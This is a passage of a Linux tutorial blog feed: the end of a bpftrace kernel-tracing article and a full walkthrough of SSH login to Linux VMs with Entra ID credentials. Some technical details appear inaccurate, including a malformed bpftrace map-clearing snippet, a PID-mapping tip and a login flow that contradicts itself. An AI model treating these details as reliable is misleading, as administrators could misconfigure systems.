<p><strong>Maps grow unbounded by default:</strong> <code class="" data-line="">@[comm] = count()</code> will accumulate an entry per unique <code class="" data-line="">comm</code> value forever in the current session. Use <code class="" data-line="">clear(@)</code> in an interval block, or set a key limit: <code class="" data-line="">@[comm] = count(); if (@[comm] &gt; 100) { clear(@comm); }</code>.</p>
<p><strong>kprobe instability:</strong> Functions targeted by kprobes can be inlined by the compiler between kernel versions, making the probe silently ineffective. If a kprobe isn&#8217;t firing, verify the function exists: <code class="" data-line="">bpftrace -l &#039;kprobe:function_name&#039;</code>. If it returns nothing, the function was inlined. Use a tracepoint equivalent instead.</p>
<p><strong>Container PIDs:</strong> PIDs inside a container are different from host PIDs. <code class="" data-line="">pid</code> in bpftrace is the host namespace PID.</p>
<blockquote>
<p><strong>Container PID semantics:</strong> When a container shows PID 1 internally, the host kernel sees it as PID 8432 (or whatever was assigned). bpftrace&#8217;s <code class="" data-line="">pid</code> built-in always gives you the <em>host-namespace</em> PID. To find the container-namespace PID that a host PID corresponds to, run this on the host: <code class="" data-line="">cat /proc/&lt;host-pid&gt;/status | grep NSpid</code> — the first value is the host PID and the second is the PID inside the container. Or use <code class="" data-line="">curtask-&gt;real_parent-&gt;tgid</code> in your probe to walk the process tree. This matters when you filter by <code class="" data-line="">pid</code> in a one-liner and get no output — you may be filtering on the container-namespace PID instead of the host one.</p>
</blockquote>
<p><strong>BTF requirement:</strong> bpftrace requires BTF for struct field access (<code class="" data-line="">$sk-&gt;__sk_common.skc_daddr</code>). If BTF is unavailable, struct access fails. Check <code class="" data-line="">/sys/kernel/btf/vmlinux</code> exists before running struct-access one-liners.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>Probe type</th>
<th>Syntax</th>
<th>Use for</th>
</tr>
</thead>
<tbody>
<tr>
<td>kernel function entry</td>
<td><code class="" data-line="">kprobe:function_name</code></td>
<td>Function arguments</td>
</tr>
<tr>
<td>kernel function return</td>
<td><code class="" data-line="">kretprobe:function_name</code></td>
<td>Return value, latency</td>
</tr>
<tr>
<td>kernel tracepoint</td>
<td><code class="" data-line="">tracepoint:subsys:name</code></td>
<td>Stable, versioned hooks</td>
</tr>
<tr>
<td>userspace function</td>
<td><code class="" data-line="">uprobe:/path/to/bin:function</code></td>
<td>App-level observation</td>
</tr>
<tr>
<td>CPU sampling</td>
<td><code class="" data-line="">profile:hz:99</code></td>
<td>Flamegraphs, hot code</td>
</tr>
<tr>
<td>interval</td>
<td><code class="" data-line="">interval:s:N</code></td>
<td>Periodic aggregation</td>
</tr>
<tr>
<td>process start</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_enter_execve</code></td>
<td>New process detection</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Built-in variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="" data-line="">pid</code></td>
<td>Process ID (host namespace)</td>
</tr>
<tr>
<td><code class="" data-line="">tid</code></td>
<td>Thread ID</td>
</tr>
<tr>
<td><code class="" data-line="">comm</code></td>
<td>Process name (15 chars)</td>
</tr>
<tr>
<td><code class="" data-line="">nsecs</code></td>
<td>Nanoseconds since boot</td>
</tr>
<tr>
<td><code class="" data-line="">curtask</code></td>
<td>Pointer to <code class="" data-line="">task_struct</code></td>
</tr>
<tr>
<td><code class="" data-line="">retval</code></td>
<td>Return value (kretprobe/tracepoint exit)</td>
</tr>
<tr>
<td><code class="" data-line="">args</code></td>
<td>Probe arguments struct</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>bpftrace is an eBPF compiler, not a monitoring agent — every one-liner compiles, loads, runs, and cleans up a complete kernel program</li>
<li>kretprobe and tracepoint cover most production debugging needs; use tracepoints for stability across kernel versions</li>
<li>The security use cases are unique: kernel-level observation that an attacker inside a container cannot suppress, because the probe runs on the host in kernel space</li>
<li>Every connection, every file open, every process spawn — observable in real time with a single command, no prior instrumentation</li>
<li>Production caution: high-frequency probes on hot paths add overhead; filter by pid/comm, use <code class="" data-line="">--timeout</code>, watch <code class="" data-line="">%si</code></li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>bpftrace answers questions you ask in the moment. EP10 covers what happens when you need those answers continuously — not as a one-shot investigation tool, but as persistent telemetry recording every network connection across your entire cluster.</p>
<p>Flow observability from TC hooks is the always-on version: a persistent eBPF program recording every connection attempt, every retransmit, every dropped packet — the ground truth layer that everything above it interprets. When your APM says &#8220;timeout&#8221; and the kernel says &#8220;retransmit storm to one specific endpoint,&#8221; the kernel is right.</p>
<p><em>Next: <a href="/ebpf-network-flow-observability/">network flow observability at the kernel level</a></em></p>
<p>Get EP10 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fbpftrace-kernel-observability%2F&amp;linkname=bpftrace%20%E2%80%94%20Kernel%20Answers%20in%20One%20Line" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fbpftrace-kernel-observability%2F&amp;linkname=bpftrace%20%E2%80%94%20Kernel%20Answers%20in%20One%20Line" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fbpftrace-kernel-observability%2F&amp;linkname=bpftrace%20%E2%80%94%20Kernel%20Answers%20in%20One%20Line" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fbpftrace-kernel-observability%2F&amp;linkname=bpftrace%20%E2%80%94%20Kernel%20Answers%20in%20One%20Line" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fbpftrace-kernel-observability%2F&amp;linkname=bpftrace%20%E2%80%94%20Kernel%20Answers%20in%20One%20Line" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fbpftrace-kernel-observability%2F&amp;linkname=bpftrace%20%E2%80%94%20Kernel%20Answers%20in%20One%20Line" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fbpftrace-kernel-observability%2F&amp;linkname=bpftrace%20%E2%80%94%20Kernel%20Answers%20in%20One%20Line" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" 
href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fbpftrace-kernel-observability%2F&#038;title=bpftrace%20%E2%80%94%20Kernel%20Answers%20in%20One%20Line" data-a2a-url="https://linuxcent.com/bpftrace-kernel-observability/" data-a2a-title="bpftrace — Kernel Answers in One Line"></a></p><p>The post <a href="https://linuxcent.com/bpftrace-kernel-observability/">bpftrace — Kernel Answers in One Line</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/bpftrace-kernel-observability/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1839</post-id>	</item>
		<item>
		<title>Entra ID Linux Login: SSH Authentication with Azure AD Credentials</title>
		<link>https://linuxcent.com/entra-id-linux-login/</link>
					<comments>https://linuxcent.com/entra-id-linux-login/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Sat, 09 May 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[Identity & Authentication]]></category>
		<category><![CDATA[Authentication]]></category>
		<category><![CDATA[Azure AD]]></category>
		<category><![CDATA[Cloud Security]]></category>
		<category><![CDATA[Entra ID]]></category>
		<category><![CDATA[Identity Management]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[SSH]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1805</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">minutes</span></span>Enable Entra ID SSH login on Linux: aad-auth package, Conditional Access Policies, pam_aad stack, and Entra ID Connect for hybrid on-prem sync.</p>
<p>The post <a href="https://linuxcent.com/entra-id-linux-login/">Entra ID Linux Login: SSH Authentication with Azure AD Credentials</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code blocks: dark panel; position:relative anchors the absolutely positioned copy button and language badge. */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light chip; the chip is reset when the code sits inside a pre. */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* Left-border colour per language family, keyed on the data-lang attribute set on the pre. */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: hidden by default, revealed on hover. */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
/* Keep the button visible when it has keyboard focus; kept as its own rule so it cannot invalidate the hover rule. */
.lc-copy-btn:focus{opacity:1}
/* Devices without hover (touch) could never reveal the button, so always show it there. */
@media (hover:none){.lc-copy-btn{opacity:1}}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: decorative label in the top-left corner, shown on hover only. */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Article tables: full width, bordered cells, zebra striping. */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
// Code-block enhancer: gives every <pre> a language badge (when the language is
// known) and a "Copy" button that copies the block's text to the clipboard.
(function(){
  // Guard flag: if the snippet is present more than once on a page, only the first copy runs.
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  // Text of a <pre> that has no <code> child, without the controls injected by this script.
  // Reading pre.innerText directly would put the button label ("Copy") on the clipboard.
  // Works on a detached clone so the live DOM and keyboard focus are untouched; <br> elements
  // become newlines because textContent would otherwise drop them.
  function preText(pre){
    var copy=pre.cloneNode(true);
    copy.querySelectorAll('.lc-copy-btn,.lc-lang-badge').forEach(function(el){el.parentNode.removeChild(el);});
    copy.querySelectorAll('br').forEach(function(br){br.parentNode.replaceChild(document.createTextNode('\n'),br);});
    return copy.textContent;
  }
  // Decorates every <pre> in the document with the badge and the copy button.
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      // The language is taken from a "language-xyz" class on the <code> element, if there is one.
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        pre.setAttribute('data-lang',lang); // hook for the pre[data-lang=...] border colours in the stylesheet
        var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      btn.type='button'; // never behave as a submit button if the <pre> sits inside a form
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        // Read the text at click time so later changes to the block are picked up.
        var text=code?code.innerText:preText(pre);
        // Prefer the async Clipboard API; fall back to execCommand when it is unavailable or rejects.
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  // Success feedback: show "Copied!" for two seconds, then restore the label.
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  // Failure feedback: show the failure label for two seconds, then restore the label.
  function failed(btn){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  // Fallback copy through a temporary off-screen <textarea> and document.execCommand('copy').
  function fb(text,btn){
    var ta=document.createElement('textarea');
    var copied=false;
    try{
      ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);ta.select();
      // execCommand returns false when the copy was refused; only a true result counts as success.
      copied=document.execCommand('copy');
    }catch(e){copied=false;}
    finally{if(ta.parentNode)ta.parentNode.removeChild(ta);} // always remove the helper element, even after an exception
    if(copied){ok(btn);}else{failed(btn);}
  }
  // Run immediately if the DOM is already parsed, otherwise wait for DOMContentLoaded.
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>The Identity Stack, Episode 12</em><br />
<a href="/identity-providers-explained/">EP11: Identity Providers</a> → <strong>EP12</strong> → <a href="/zero-trust-identity-spiffe-spire/">EP13: Zero Trust Identity</a> → &#8230;</p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li>Entra ID (Azure AD) Linux login lets you SSH into a VM using your Azure AD credentials — no local Linux accounts, no SSH keys to distribute</li>
<li>The stack: <code class="" data-line="">aad-auth</code> package + <code class="" data-line="">pam_aad.so</code> + SSSD — Azure authenticates via OIDC device code flow or password, then maps the identity to a local Linux UID</li>
<li>Entra ID is not AD — it&#8217;s OIDC/OAuth2 native, with no LDAP and no Kerberos (unless you add Azure AD DS, a separate managed service)</li>
<li>Conditional Access Policies can gate Linux logins — MFA, device compliance, location restrictions — the same policies as for web apps</li>
<li>Two login modes: interactive (browser-based device code, for non-Azure VMs) and integrated (Azure IMDS-based, for Azure VMs)</li>
<li>Required roles: <code class="" data-line="">Virtual Machine Administrator Login</code> or <code class="" data-line="">Virtual Machine User Login</code> on the VM — IAM, not local sudoers</li>
</ul>
<hr />
<h2 id="the-big-picture-how-entra-id-linux-login-works">The Big Picture: How Entra ID Linux Login Works</h2>
<pre><code class="" data-line="">User: ssh vamshi@vm.corp.azure.com

  sshd on Linux VM
      │
      ▼
  PAM (/etc/pam.d/sshd)
      │
      ├── pam_aad.so (auth)
      │     │
      │     │  OIDC device code flow:
      │     │  &quot;Go to microsoft.com/devicelogin and enter code ABCD-1234&quot;
      │     │  User authenticates in browser with MFA
      │     │  Entra ID issues id_token + access_token
      │     ▼
      │   pam_aad validates token:
      │     • signature (JWKS from Entra ID)
      │     • tenant ID (iss claim)
      │     • VM resource audience (aud claim)
      │     • group membership (groups claim)
      │
      └── pam_mkhomedir (session)
            Creates /home/vamshi@corp.com on first login

  Shell session created
  whoami → vamshi_corp_com (sanitized UPN for Linux username)
</code></pre>
<p>EP11 mapped the IdP landscape. This episode gets specific: Entra ID and Linux. Understanding this matters because Entra ID is increasingly where enterprise identities live, and cloud VMs that people SSH into with local accounts are an operational and security liability.</p>
<hr />
<h2 id="entra-id-vs-active-directory-whats-different">Entra ID vs Active Directory: What&#8217;s Different</h2>
<p>This distinction matters before configuring anything.</p>
<table>
<thead>
<tr>
<th></th>
<th>Active Directory (on-prem)</th>
<th>Entra ID (cloud)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Protocol</td>
<td>LDAP + Kerberos</td>
<td>OIDC + OAuth2</td>
</tr>
<tr>
<td>Directory queries</td>
<td><code class="" data-line="">ldapsearch</code></td>
<td>Microsoft Graph API</td>
</tr>
<tr>
<td>Linux join</td>
<td><code class="" data-line="">realm join</code> (adcli + SSSD)</td>
<td><code class="" data-line="">aad-auth</code> package</td>
</tr>
<tr>
<td>Authentication</td>
<td>Kerberos tickets</td>
<td>JWT tokens</td>
</tr>
<tr>
<td>Group policy</td>
<td>GPO via Sysvol</td>
<td>Conditional Access + Intune</td>
</tr>
<tr>
<td>Network requirement</td>
<td>DC reachable on LAN/VPN</td>
<td>HTTPS to login.microsoftonline.com</td>
</tr>
</tbody>
</table>
<p>Entra ID has no LDAP interface and no Kerberos realm. You cannot run <code class="" data-line="">ldapsearch</code> against it. You cannot <code class="" data-line="">kinit</code> to it. The authentication protocol is entirely OIDC/OAuth2 — the same protocol your browser uses to &#8220;Login with Microsoft.&#8221;</p>
<p>If you need LDAP and Kerberos from Azure, that&#8217;s <strong>Azure AD Domain Services</strong> — a separate managed service that Microsoft runs, which does speak LDAP and Kerberos. It&#8217;s not Entra ID; it&#8217;s a managed AD replica in Azure. EP12 covers the Entra ID path — the modern, protocol-native approach.</p>
<hr />
<h2 id="prerequisites">Prerequisites</h2>
<pre><code class="" data-line=""># Azure side:
# 1. The VM&#039;s managed identity must be enabled (System-assigned)
# 2. One of two Azure RBAC roles assigned on the VM resource:
#    - &quot;Virtual Machine Administrator Login&quot; (for sudo access)
#    - &quot;Virtual Machine User Login&quot; (for regular access)
# 3. Conditional Access policies that apply to the VM login scope

# VM side (Ubuntu 20.04+ / RHEL 8+):
# Install the aad-auth package (Microsoft-maintained)
curl -sSL https://packages.microsoft.com/keys/microsoft.asc \
  | gpg --dearmor -o /usr/share/keyrings/microsoft.gpg
echo &quot;deb [signed-by=/usr/share/keyrings/microsoft.gpg] \
  https://packages.microsoft.com/ubuntu/22.04/prod jammy main&quot; \
  &gt; /etc/apt/sources.list.d/microsoft.list
apt-get update &amp;&amp; apt-get install -y aad-auth
</code></pre>
<hr />
<h2 id="configuration">Configuration</h2>
<pre><code class="" data-line=""># Configure the aad-auth package
aad-auth configure \
  --tenant-id 12345678-1234-1234-1234-123456789abc \
  --app-id 87654321-4321-4321-4321-cba987654321

# This writes /etc/aad.conf:
# [aad]
# tenant_id = 12345678-...
# app_id = 87654321-...
# version = 1

# Verify the PAM configuration was updated
grep pam_aad /etc/pam.d/common-auth
# auth [success=1 default=ignore] pam_aad.so
</code></pre>
<p>The <code class="" data-line="">aad-auth</code> package installs <code class="" data-line="">pam_aad.so</code> and configures PAM automatically. It also modifies <code class="" data-line="">/etc/nsswitch.conf</code> to add <code class="" data-line="">aad</code> as a source for <code class="" data-line="">passwd</code> lookups — so <code class="" data-line="">getent passwd vamshi@corp.com</code> works after the first login.</p>
<hr />
<h2 id="the-login-flow">The Login Flow</h2>
<h3 id="on-an-azure-vm-integrated-mode">On an Azure VM (Integrated mode)</h3>
<p>Azure VMs have access to the Instance Metadata Service (IMDS) at <code class="" data-line="">169.254.169.254</code>. <code class="" data-line="">pam_aad</code> uses the VM&#8217;s managed identity to get a token from IMDS, which proves the VM is trusted, then validates the user&#8217;s token against the tenant.</p>
<pre><code class="" data-line=""># User SSHes with username as UPN (user@tenant.onmicrosoft.com or user@corp.com)
ssh vamshi@corp.com@vm.eastus.cloudapp.azure.com

# Or use the short form if the tenant is configured:
ssh vamshi@vm.eastus.cloudapp.azure.com
</code></pre>
<p>On first connection, <code class="" data-line="">pam_aad</code> initiates the device code flow:</p>
<pre><code class="" data-line="">To sign in, use a web browser to open https://microsoft.com/devicelogin
and enter the code ABCD-1234 to authenticate.
</code></pre>
<p>The user opens the URL in any browser (on any device), enters the code, and authenticates with their Entra ID credentials + MFA. The SSH session gets a token. Subsequent logins within the token cache TTL skip the device code step.</p>
<h3 id="username-format-on-the-linux-system">Username format on the Linux system</h3>
<p>Entra ID usernames (UPNs) contain <code class="" data-line="">@</code> — not valid in Linux usernames. <code class="" data-line="">aad-auth</code> sanitizes the UPN:</p>
<pre><code class="" data-line="">vamshi@corp.com → vamshi_corp_com    (default)
# or, with shorter_username enabled in /etc/aad.conf:
vamshi@corp.com → vamshi
</code></pre>
<p>The UID is derived from the Azure AD Object ID (a deterministic hash) — stable across logins, same UID on every VM in the tenant.</p>
<hr />
<h2 id="conditional-access-for-linux-logins">Conditional Access for Linux Logins</h2>
<p>Conditional Access Policies in Entra ID apply to Linux VM logins the same way they apply to web app logins.</p>
<pre><code class="" data-line="">Policy: Require MFA for Linux VM Login
  Conditions:
    Cloud apps: &quot;Azure Linux VM Sign-In&quot;
    Users: All users (or specific groups)
  Grant:
    Require multi-factor authentication
    Require compliant device (optional)
</code></pre>
<p>With this policy, every SSH login triggers MFA — regardless of whether the client machine supports it. The MFA challenge appears in the device code flow (the browser window the user opens).</p>
<p>You can also enforce:</p>
<ul>
<li><strong>Location restrictions</strong> — only from corporate IP ranges</li>
<li><strong>Device compliance</strong> — device must be Intune-managed</li>
<li><strong>Sign-in risk</strong> — block logins flagged as risky by Entra ID Identity Protection</li>
</ul>
<p>This is the operational shift: Linux login security is now managed in the same Conditional Access policy engine as every other Entra ID-protected resource. No more per-machine PAM configuration for MFA.</p>
<hr />
<h2 id="role-based-access-who-can-log-in">Role-Based Access: Who Can Log In</h2>
<p>Access to the VM is controlled by Azure RBAC — not by local Linux groups or sudoers.</p>
<pre><code class="" data-line=""># Grant a user SSH access to the VM
az role assignment create \
  --assignee vamshi@corp.com \
  --role &quot;Virtual Machine User Login&quot; \
  --scope /subscriptions/SUB_ID/resourceGroups/RG/providers/Microsoft.Compute/virtualMachines/VM_NAME

# Grant admin (sudo) access
az role assignment create \
  --assignee vamshi@corp.com \
  --role &quot;Virtual Machine Administrator Login&quot; \
  --scope /subscriptions/SUB_ID/...
</code></pre>
<p><code class="" data-line="">Virtual Machine Administrator Login</code> maps to the <code class="" data-line="">sudo</code> group on the Linux VM. Users with this role get passwordless sudo. Users with <code class="" data-line="">Virtual Machine User Login</code> get a regular shell.</p>
<p>The mapping is enforced by <code class="" data-line="">pam_aad</code> checking the <code class="" data-line="">groups</code> claim in the token against the configured admin group. No <code class="" data-line="">/etc/sudoers.d/</code> files needed.</p>
<hr />
<h2 id="debugging-entra-id-linux-logins">Debugging Entra ID Linux Logins</h2>
<pre><code class="" data-line=""># Check aad-auth service status
systemctl status aad-auth

# View aad-auth logs
journalctl -u aad-auth -f

# Attempt a manual token validation (requires aad-auth debug mode)
aad-auth login --username vamshi@corp.com

# Check the local user cache
getent passwd vamshi_corp_com
# Returns if the user has logged in before

# Clear the local cache (forces re-authentication)
aad-auth clean-cache

# Verify Conditional Access isn&#039;t blocking (check Entra ID Sign-in logs)
# Azure Portal → Entra ID → Sign-in logs → filter by user + app &quot;Azure Linux VM Sign-In&quot;
</code></pre>
<p>The Entra ID Sign-in logs in the Azure Portal show every authentication attempt, the Conditional Access policies that evaluated, which ones passed/failed, and the exact failure reason. This is far more diagnostic than reading PAM logs.</p>
<hr />
<h2 id="entra-id-connect-bringing-on-prem-users-to-entra-id">Entra ID Connect: Bringing On-Prem Users to Entra ID</h2>
<p>For organizations with existing on-prem AD who want to enable Entra ID Linux login:</p>
<pre><code class="" data-line="">On-prem AD users → Entra ID Connect sync → Entra ID
                                                │
                                    Linux VM login (aad-auth)
</code></pre>
<p>Entra ID Connect is a Windows Server application that syncs users from on-prem AD to Entra ID (every 30 minutes by default). Users authenticate against Entra ID, which verifies their credentials through one of three methods: Password Hash Sync, Pass-Through Authentication, or Federation. The Linux VM doesn&#8217;t know or care — it sees an Entra ID token.</p>
<p>With Password Hash Sync: password hashes (not plaintext) are synced to Entra ID — users authenticate directly in the cloud.<br />
With Pass-Through Authentication: Entra ID forwards authentication requests to an on-prem agent that validates against AD — no password hashes leave the datacenter.<br />
With Federation (AD FS / Entra ID as a relying party): Entra ID delegates authentication to AD FS — the most complex, the most on-prem control.</p>
<hr />
<h2 id="common-misconceptions"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Common Misconceptions</h2>
<p><strong>&#8220;Entra ID = Azure Active Directory = Active Directory.&#8221;</strong> Entra ID is just the new name for Azure AD, but neither is Active Directory — and there are three different things to keep apart. Active Directory: on-prem, LDAP+Kerberos. Entra ID (formerly Azure AD): cloud, OIDC+OAuth2. Azure AD Domain Services: managed AD replica in Azure, LDAP+Kerberos, not Entra ID.</p>
<p><strong>&#8220;You need Azure AD DS to join Linux to Azure.&#8221;</strong> Azure AD DS is the managed AD service. Entra ID Linux login (via aad-auth) is entirely separate and doesn&#8217;t require AD DS. You can authenticate Linux to Entra ID directly via OIDC.</p>
<p><strong>&#8220;The Linux username matches the Entra ID username.&#8221;</strong> The UPN is sanitized (<code class="" data-line="">@</code> → <code class="" data-line="">_</code>) to produce a valid Linux username. The canonical identity is the UPN or the Entra Object ID. Don&#8217;t hardcode the sanitized username in scripts.</p>
<hr />
<h2 id="framework-alignment">Framework Alignment</h2>
<table>
<thead>
<tr>
<th>Domain</th>
<th>Relevance</th>
</tr>
</thead>
<tbody>
<tr>
<td>CISSP Domain 5: Identity and Access Management</td>
<td>Entra ID Linux login centralizes Linux VM access in the same IAM system as all other enterprise resources — one policy engine, one audit log</td>
</tr>
<tr>
<td>CISSP Domain 3: Security Architecture and Engineering</td>
<td>Eliminating per-VM local accounts removes a class of credential management risk — no SSH keys to rotate, no local accounts to audit</td>
</tr>
<tr>
<td>CISSP Domain 1: Security and Risk Management</td>
<td>Conditional Access Policies enforcing MFA on Linux logins reduce the risk of credential-based compromise of cloud VMs</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>Entra ID Linux login uses OIDC device code flow — no LDAP, no Kerberos, no local Linux accounts</li>
<li><code class="" data-line="">aad-auth</code> package installs <code class="" data-line="">pam_aad.so</code> and handles the full authentication stack: token issuance, validation, user cache, UID mapping</li>
<li>VM access is controlled by Azure RBAC roles (<code class="" data-line="">Virtual Machine Administrator Login</code> / <code class="" data-line="">Virtual Machine User Login</code>) — not by sudoers files</li>
<li>Conditional Access Policies apply to Linux VM logins — MFA, device compliance, and location restrictions use the same engine as every other Entra ID app</li>
<li>Debugging starts in Entra ID Sign-in logs (Azure Portal), not in <code class="" data-line="">/var/log/auth.log</code></li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>EP12 showed how Entra ID enables Linux logins in the cloud. EP13 is the series closer: Zero Trust identity — what it means to verify identity continuously, how SPIFFE and SPIRE handle workload (non-human) identity, and where the stack goes from <code class="" data-line="">/etc/passwd</code> in 1970 to a Zero Trust policy engine in 2026.</p>
<p><em>Next: <a href="/zero-trust-identity-spiffe-spire/">Zero Trust Identity: SPIFFE, SPIRE, mTLS, and Continuous Verification</a></em></p>
<p>Get EP13 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Fentra-id-linux-login%2F&amp;linkname=Entra%20ID%20Linux%20Login%3A%20SSH%20Authentication%20with%20Azure%20AD%20Credentials" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Fentra-id-linux-login%2F&amp;linkname=Entra%20ID%20Linux%20Login%3A%20SSH%20Authentication%20with%20Azure%20AD%20Credentials" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Fentra-id-linux-login%2F&amp;linkname=Entra%20ID%20Linux%20Login%3A%20SSH%20Authentication%20with%20Azure%20AD%20Credentials" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Fentra-id-linux-login%2F&amp;linkname=Entra%20ID%20Linux%20Login%3A%20SSH%20Authentication%20with%20Azure%20AD%20Credentials" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Fentra-id-linux-login%2F&amp;linkname=Entra%20ID%20Linux%20Login%3A%20SSH%20Authentication%20with%20Azure%20AD%20Credentials" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" 